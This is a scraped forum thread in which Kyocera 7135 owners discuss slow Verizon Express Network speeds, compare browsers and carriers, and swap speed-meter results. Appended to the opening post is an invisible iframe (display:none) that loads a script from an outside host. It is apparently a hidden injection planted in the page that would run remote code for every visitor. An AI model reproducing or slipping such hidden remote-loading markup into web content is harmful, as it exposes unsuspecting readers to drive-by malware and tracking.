+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Express Network Speed/New Owner

Just got this phone and seem to be having some problems with the Express Network (I'm using just the phone, not a laptop). The settings seem to indicate that I am accessing the high speed network, but I am seeing little if any speed improvement over the 14.4 speeds of the first smartphone. I'm using the EIS browser primarily. It shows the cumulative amount of data downloaded in the top left, and it often seems to take 30 seconds (or more) to load 50k. Is that normal? Is anyone else getting faster speeds and/or have any advice how I could improve mine? I'm certainly no expert and may not have things set up right. Thanks for any info. (By the way, I'm in the DC area, which purportedly has full EN coverage).<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Most people who have used EN (myself included) don't see much of a speed difference from QNC (the regular VZW connection) when surfing from the 7135. The real speed difference shows up when you use the 7135 as a modem for a computer. The speed bottleneck seems to be the processor on the Palm side of the 7135. It just can't handle the quick display of web pages. Since I use the phone as a modem for my notebook when I travel, EN is worth it for me. I wouldn't spend extra for it otherwise.

The one issue remaining here is that while most think that it is likely the processor speed on the phone which ultimately limits the EN speed (when using the phone alone, not with a computer), there has been some discussion that the firmware upgrade may improve EN speed. So.... any comments out there as to any change in EN speed on the phone with the new verizon phones?

I got mine yesterday through Verizon's B2B. I don't have EN, I'm using QNC. But: it is noticable faster than the 6035 if that matters any.

Dagi

Re: Express Network Speed/New Owner

Originally posted by jhecht
    Just got this phone and seem to be having some problems with the Express Network (I'm using just the phone, not a laptop). The settings seem to indicate that I am accessing the high speed network, but I am seeing little if any speed improvement over the 14.4 speeds of the first smartphone. I'm using the EIS browser primarily. It shows the cumulative amount of data downloaded in the top left, and it often seems to take 30 seconds (or more) to load 50k. Is that normal? Is anyone else getting faster speeds and/or have any advice how I could improve mine? I'm certainly no expert and may not have things set up right. Thanks for any info. (By the way, I'm in the DC area, which purportedly has full EN coverage).
    EIS is REALLY slow, and using it you will not see any difference between QNC and EN because it takes so long for it to paint the screen. Get Blazer, Avantgo, or Xino and you will be much happier with the speed. I really notice a speed difference using VNC to connect to my home computer. EN is really much faster.

Alan

Anybody care to post a side-by-side comparison of these browsers (EIS, Xiino, Blazer) vis-a-vis standards support. I'd like to know if any of them support Java and SSL.

TIA
    MEast

I just ran across this file yesterday and I thought anyone using EN might be interested in running this Freeware program and see what their speed is in their area and even compare it to the QNC connection. And maybe even post on this thread their speed info, time of day and location for everyone to compare.

http://www.hexlet.com/Products/bmeter.html

Originally posted by babacksh
    I just ran across this file yesterday and I thought anyone using EN might be interested in running this Freeware program and see what their speed is in their area and even compare it to the QNC connection. And maybe even post on this thread their speed info, time of day and location for everyone to compare.

Thanks for the tip babacksh... I'm going to check it out
    Please visit my picture site: Robert-O-Rama :)

ok, first off you have to answer if you have added a 1x pricing option to your plan. The 1x speed is only active with a 1x pricing option activated.

Secondly look at your screen when placing a call and MAKE SURE you see the 1x symbol displayed. If you do not see this simbol then you MAY be connecting in IS95 mode in which case you will still only get 14.4 connection speeds.

I was in a data symposium today and physically saw the increased speed of access especially when using the eudora web browser... much faster than what the 6035 used to do.

I can also say this ... my brain is in information overload from all of the third party software solutions for Email and VPN access that were shown and talked about.

So many companies have their hands in this product it's not even funny

Just what I've been looking for-- a speedmeter that will work with the 7135. Thanks.

On EN in a marginal coverage area I'm getting 1826 bytes/second. Can't connect right now via QNC. I'll try from a better coverage area tomorrow.

If I remember my old modem conversions correctly, 1826 bytes/sec is about 16.4k. (bites x 9 = baud, I think) Someone jump in and correct me if I'm wrong. (as if I had to ask!)

Originally posted by semm71
    I was in a data symposium today and physically saw the increased speed of access especially when using the eudora web browser... much faster than what the 6035 used to do.

I can also say this ... my brain is in information overload from all of the third party software solutions for Email and VPN access that were shown and talked about.

So many companies have their hands in this product it's not even funny
    Man... I wish I had known about that syposium! It sounds like it was very interesting So, did they clearly demonstrate that using EN directly on the 7135 was significantly faster than using QNC on the 7135?

I didn't use the download meter mentioned above. I did go to one of the web sites that measure speed. It didn't work quite right. I think because it must use a redirect to the browser that isn't supported. It did provide a 340k document to download and I measured it by hand. I came up with 10K/sec for the first 100 bytes and about 16k for the whole thing. This stinks. I'm paying a bunch of money for EN and it's doing nothing. It seems to me that it is not different. Just to compare, I connected via Q2N and the speeds as I watched the counter in the browser were exactly the same as my experience with EN.

I talked with a guy from Verizon and we tried a bunch of things from setting up a new network connection to downloading a new PRL. He is going to check on some more things and call me back. Has anyone had experience w/ the Sprint high speed network. Is it noticeable different on their network?

Originally posted by TOMC
    Has anyone had experience w/ the Sprint high speed network. Is it noticeable different on their network?
    I had the Treo 300 with Vision for almost 5 months... and it performed pretty well, but I never ran any tests to compare it to the old Wireless Web, or to Verizon's data speeds. But, from what I remember, the Vision data speeds didn't seem any faster than my EN is now.

I ran some very basic expeiments to compare Vision to EN speeds. I connected one laptop to my Treo 300 and another laptop to my 7135 and visited multiple sites on both laptops in duplicate. Vision blew EN away, not even close. Vision's pages loaded anywhere from 10-50 seconds faster depending on hwo graphic heavy the page was. CNET returned a bandwidth rating of 120kbps for Vision and 45kbps for EN. I was in a pretty good coverage area for both networks as well. Even though I knew this was pretty much going to be the case when I switched from Sprint to Verizon, I still do not like it. Oh well, I have the better device and that more than makes up for it.

Originally posted by Marty
    Even though I knew this was pretty much going to be the case when I switched from Sprint to Verizon, I still do not like it. Oh well, I have the better device and that more than makes up for it.
    That's the way I'm looking at it also. I do wonder what kind of performance Vision had on the Treo itself, compared to EN on the 7135.

Now I know browsing on the 7135 doesn't really show any performance...

What about downloading/uploading files. Is it as slow as QNC connection? Uploading a few hundred kilo to the office took 4-5 minutes. And that is painfully slow. Would EN improve this or will the phone bottlenecks this as well?

At about noon today I ran some quick tests of EN vs. QNC using the freeware app. I ran 10 tests (each with 10 passes). EN averaged 2.60 kbps, QNC averaged 1.32 kbps. There was a lot of fluctuation (the highest EN average of the 10 tests was 3.45 kbps, and the lowest EN test was 1.98 kbps).

The method of testing used by the freeware app seems pretty sound to me. I would be curious to see other testing results. I’m going to run it again tonight late in the evening (which is when I use data most) to see if there is a big difference.

p.s. It's been so long since I used a dial-up modem. What is generally the kbps you can expect there?

Thanks for posting that file! Now I know I'm getting in the area of 20kps. Swell. Now how do I fix it? I have EN for $20.00 per month. It's not worth the money for 5.6k

I'm able to check speed on EN using bmeter, but I can't get it to work in QNC. I keep getting an error message about it being "unable to open network library." Any idea what that means?

Originally posted by ogakor
    I'm able to check speed on EN using bmeter, but I can't get it to work in QNC. I keep getting an error message about it being "unable to open network library." Any idea what that means?
    I had a similar problem and I think it has to do with trying to run the tests right after each other, switching the connection in between.

I just tried QNC first and it worked fine.